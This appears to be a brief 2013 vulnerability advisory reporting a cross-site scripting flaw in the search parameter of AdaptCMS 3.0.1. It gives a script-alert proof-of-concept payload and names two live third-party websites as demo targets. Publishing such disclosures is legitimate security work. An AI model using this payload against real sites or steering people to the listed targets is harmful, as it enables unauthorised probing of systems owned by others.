AdaptCMS version 3.0.1 suffers from a cross site scripting vulnerability.
243223029ac964b94ed2eb150b80741e
AdaptCMS 3.0.1 Cross Site Scripting Vulnerability
Author : syst3m_f4ult
Homepage : http://www.adaptcms.com/
Vendor : Adapt CMS
Version : 3.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
The following page is vulnerable to XSS (Method: POST):
http://localhost/search <http://localhost/login/> [data[Search][q]
parameter]
Insert the following code inside the search box and hit Enter
<script>alert('syst3m_f4ult')</script>
Demo:
http://www.solitudeisbliss.com/search/
http://www.insanevisions.com/search/
Comments
Subscribe to this comment feedNo comments yet, be the first!